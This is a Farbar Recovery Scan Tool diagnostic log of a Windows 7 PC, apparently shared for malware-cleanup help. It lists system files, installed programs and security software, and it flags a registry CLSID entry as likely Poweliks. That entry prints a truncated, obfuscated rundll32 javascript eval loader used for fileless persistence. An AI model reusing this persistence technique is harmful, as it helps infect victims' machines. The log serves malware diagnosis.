2014-10-15 13:53 - 2014-06-27 19:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 13:53 - 2014-06-27 19:21 - 00532176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 13:53 - 2014-06-27 19:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-15 13:53 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-15 13:52 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 13:52 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-15 13:52 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-15 13:52 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-15 13:52 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-15 13:52 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-15 13:52 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-15 13:52 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-15 13:52 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-15 13:52 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-15 13:52 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-15 13:52 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-15 13:52 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-15 13:52 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-15 13:52 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-15 13:52 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-15 13:52 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-15 13:52 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-15 13:52 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-15 13:52 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-15 13:52 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-15 13:52 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-15 13:52 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-15 13:52 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-15 13:52 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-15 13:52 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-15 13:52 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-15 13:52 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-15 13:52 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-15 13:52 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-15 13:52 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-15 13:52 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-15 13:52 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-15 13:52 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-15 13:52 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-15 13:52 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-15 13:52 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-15 13:52 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-15 13:52 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-15 13:52 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-15 13:52 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-15 13:52 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-15 13:52 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-15 13:52 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-15 13:52 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-15 13:52 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-15 13:52 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-15 13:52 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-15 13:52 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-15 13:52 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-15 13:52 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-15 13:52 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-15 13:52 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-15 13:52 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 13:52 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-15 13:52 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 13:52 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 13:52 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 13:52 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 13:52 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 13:52 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-15 13:52 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-15 13:52 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-15 13:52 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 13:52 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 13:51 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 13:51 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-02 15:02 - 2014-06-28 15:22 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-11-02 14:29 - 2011-11-26 19:42 - 01202255 _____ () C:\Windows\WindowsUpdate.log
2014-11-02 11:34 - 2012-08-08 23:01 - 00000000 ____D () C:\Users\Deborah\AppData\Local\CrashDumps
2014-11-02 11:24 - 2012-02-12 01:06 - 00000000 ____D () C:\ProgramData\MFAData
2014-11-02 07:51 - 2013-07-10 12:18 - 00000000 ____D () C:\ProgramData\LogMeIn
2014-11-01 15:02 - 2012-02-11 21:13 - 00000528 _____ () C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2014-11-01 15:01 - 2012-02-11 21:13 - 00003498 _____ () C:\Windows\System32\Tasks\SystemToolsDailyTest
2014-11-01 15:01 - 2012-02-11 21:13 - 00003448 _____ () C:\Windows\System32\Tasks\PCDEventLauncher
2014-11-01 15:01 - 2012-02-11 21:13 - 00000466 _____ () C:\Windows\Tasks\SystemToolsDailyTest.job
2014-10-31 05:38 - 2009-07-13 23:45 - 00031296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-31 05:38 - 2009-07-13 23:45 - 00031296 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-31 05:37 - 2009-07-14 00:13 - 00786662 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-31 05:32 - 2014-01-21 14:19 - 00001015 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Client.lnk
2014-10-31 05:32 - 2014-01-21 14:19 - 00000999 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk
2014-10-31 05:31 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-31 05:03 - 2013-07-10 12:22 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-31 04:59 - 2011-11-26 20:04 - 00000000 ____D () C:\Program Files\Google
2014-10-31 04:59 - 2011-11-26 20:03 - 00000000 ____D () C:\Program Files (x86)\Google
2014-10-31 04:23 - 2012-02-11 21:25 - 00000000 ____D () C:\Users\Deborah\AppData\Local\Google
2014-10-31 04:23 - 2011-11-26 20:04 - 00000000 ____D () C:\ProgramData\Google
2014-10-27 11:35 - 2014-06-28 15:22 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-27 11:35 - 2014-06-28 15:22 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-27 11:35 - 2014-06-28 15:22 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-21 09:54 - 2012-02-12 01:08 - 00000000 ____D () C:\Program Files (x86)\AVG
2014-10-21 09:53 - 2014-03-31 08:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-10-21 09:53 - 2012-07-23 09:18 - 00000000 ___HD () C:\$AVG
2014-10-16 08:33 - 2009-07-13 23:57 - 00001547 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-16 03:10 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-16 02:33 - 2009-07-13 23:45 - 00455760 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 02:30 - 2014-05-07 02:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-16 02:30 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-16 02:30 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-16 02:07 - 2014-06-28 15:03 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-16 02:00 - 2012-02-11 22:10 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

Files to move or delete:
====================
C:\Users\Deborah\en_res.dll
C:\Users\Deborah\es_res.dll
C:\Users\Deborah\fr_res.dll
C:\Users\Deborah\g2ax_customer_downloadhelper_win32_x86.exe
C:\Users\Deborah\grm_res.dll
C:\Users\Deborah\it_res.dll
C:\Users\Deborah\jp_res.dll
C:\Users\Deborah\mfc80u.dll
C:\Users\Deborah\msvcr80.dll
C:\Users\Deborah\PCPE Setup.exe
C:\Users\Deborah\pt_res.dll
C:\Users\Deborah\ResourceReader.dll
C:\Users\Deborah\ru_res.dll
C:\Users\Deborah\zh_res.dll


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-25 23:54

==================== End Of Log ============================

 

Additional.txt

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-11-2014
Ran by Deborah at 2014-11-02 15:21:06
Running from C:\Users\Deborah\Downloads
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Access Help (HKLM-x32\...\{C6FA39A7-26B1-480A-BC74-6D17531AC222}) (Version: 2.00 - Lenovo)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 10 Plugin (HKLM-x32\...\{0DFB3DE8-65B9-44FF-AA0A-3BECC5A2BFD1}) (Version: 10.0.32.18 - Adobe Systems, Inc.)
Adobe Flash Player 12 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 12.0.0.44 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5315 - AVG Technologies)
AVG 2015 (Version: 15.0.4189 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5315 - AVG Technologies) Hidden
AVG Security Toolbar (HKLM-x32\...\AVG Secure Search) (Version: 18.1.9.799 - AVG Technologies)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.4.1.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version:  - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.2.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version:  - Canon Inc.)
Canon MX920 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX920_series) (Version: 1.00 - Canon Inc.)
Canon MX920 series On-screen Manual (HKLM-x32\...\Canon MX920 series On-screen Manual) (Version: 7.6.0 - Canon Inc.)
Canon MX920 series User Registration (HKLM-x32\...\Canon MX920 series User Registration) (Version:  - ‭Canon Inc.)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 1.1.0 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 1.0.1 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.1.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.1.0 - Canon Inc.)
Canon Speed Dial Utility (HKLM-x32\...\Speed Dial Utility) (Version: 1.3.0 - Canon Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 3.15 - Piriform)
Citrix Presentation Server Client - Web Only (HKLM-x32\...\{E9459BCF-0982-498B-ABA7-26C34323493F}) (Version: 10.200.2650 - Citrix Systems, Inc.)
Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
D-Link DWA-125 (HKLM-x32\...\{E45CACFE-0576-4375-A84F-C34B99A7B652}) (Version:  - D-Link)
EaseUS Todo Backup Free 4.0 (HKLM-x32\...\EaseUS Todo Backup Free 4.0_is1) (Version: 4.0.0.1 - CHENGDU YIWO Tech Development Co., Ltd)
Free PDF to Word Converter 5.1.0.383 (HKLM\...\Free PDF to Word Converter_is1) (Version: 5.1.0.383 - Smart Soft)
GoToAssist Customer 2.2.0.758 (HKLM-x32\...\GoToAssist Express Customer) (Version: 2.2.0.758 - Citrix Online)
HP Officejet 6500 E710a-f Basic Device Software (HKLM\...\{EC21DBC6-C760-463D-8866-BFACBB28A3E3}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Officejet 6500 E710a-f Help (HKLM-x32\...\{037CD593-D760-4A00-B030-7BBAFA1123FE}) (Version: 140.0.2.2 - Hewlett Packard)
HP Officejet 6500 E710n-z Basic Device Software (HKLM\...\{ADDF4B84-5D28-4EAE-8511-EF808C8BC81C}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Officejet 6500 E710n-z Help (HKLM-x32\...\{130E5108-547F-4482-91EE-F45C784E08C7}) (Version: 140.0.2.2 - Hewlett Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1872 - Intel Corporation)
Intel® Management Engine Interface (HKLM\...\HECI) (Version:  - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 14.5 - Intel)
Intel® Active Management Technology (HKLM\...\MESOL) (Version:  - Intel Corporation)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lenovo Mouse Suite (HKLM\...\MouseSuite98) (Version: 6.45 - Lenovo)
Lenovo Registration (HKLM-x32\...\{6707C034-ED6B-4B6A-B21F-969B3606FBDE}) (Version: 1.0.4 - Lenovo Inc.)
Lenovo ThinkVantage Toolbox (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5849.23 - PC-Doctor, Inc.)
Lenovo Welcome (HKLM-x32\...\Lenovo Welcome_is1) (Version: 2.02.003.0 - Lenovo)
LogMeIn (HKLM-x32\...\{CB7AF84A-1B7F-4C6B-8A58-EB7CDE48C23A}) (Version: 4.1.3268 - LogMeIn, Inc.)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Message Center Plus (HKLM-x32\...\{FD331A3B-F7A5-4C31-B8D4-DF413C85AF7A}) (Version: 2.0.0012.00 - Lenovo Group Limited)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Standard 2010 (HKLM\...\Office14.STANDARDR) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.2.3 - Frank Heindörfer, Philip Chinery)
PowerChute Personal Edition 3.0.2 (HKLM-x32\...\{8ED262EE-FC73-47A9-BB86-D92223246881}) (Version: 3.0.2 - Schneider Electric)
Rescue and Recovery (HKLM-x32\...\{B383F243-0ABC-4E56-AA30-923B8D85076E}) (Version: 4.30.0025.00 - Lenovo Group Limited)
Roxio Creator Business Edition (HKLM-x32\...\{537BF16E-7412-448C-95D8-846E85A1D817}) (Version: 10.3 - Roxio)
Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden
Sonic Icons for Lenovo (HKLM-x32\...\{B334D9AE-1393-423E-97C0-3BDC3360E692}) (Version: 2.0.0 - Lenovo)
SoundMAX (HKLM-x32\...\{F0A37341-D692-11D4-A984-009027EC0A9C}) (Version: 6.10.2.6595 - Analog Devices)
System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 4.01.0015 - Lenovo)
ThinkVantage Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 1.04.0023 - Lenovo Group Limited)
TotalMD 2011 SP2 (HKLM-x32\...\TotalMD For Networks_is1) (Version:  - Dentimax, LLC)
VD64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Automated Installation Kit (HKLM\...\{31E8F586-4EF7-4500-844D-BA8756474FF1}) (Version: 2.0.0.0 - Microsoft Corporation)
Windows Driver Package - AnalogDevices (ADIHdAudAddService) MEDIA  (08/05/2009 6.10.02.6595) (HKLM\...\A5711FCDB123FDFC12A06CDCA7EA8C60F8370DC5) (Version: 08/05/2009 6.10.02.6595 - AnalogDevices)
Windows Driver Package - Intel (e1kexpress) Net  (06/22/2009 11.0.41.0) (HKLM\...\47953DA64A58724946E1C1EAFF72D4D6138B69F9) (Version: 06/22/2009 11.0.41.0 - Intel)
Windows Driver Package - Intel (HECIx64) System  (06/23/2009 5.2.0.1008) (HKLM\...\4CF241D8BEE94EE801F312E8B49B8E5BAA90F29A) (Version: 06/23/2009 5.2.0.1008 - Intel)
Windows Driver Package - Intel (Serial) Ports  (07/06/2009 5.5.1.1012) (HKLM\...\49AA6E0E36A92D25AFC2479DC7BCB705AE01CE1F) (Version: 07/06/2009 5.5.1.1012 - Intel)
Windows Driver Package - Intel Corporation (igfx) Display  (08/13/2009 8.15.10.1872) (HKLM\...\157624FFB8919EB5518C572408100A734456F2E0) (Version: 08/13/2009 8.15.10.1872 - Intel Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-606911418-3109034106-3922174115-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-606911418-3109034106-3922174115-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\powercpl.dll (Microsoft Corporation)

==================== Restore Points  =========================

30-10-2014 16:21:48 Scheduled Checkpoint
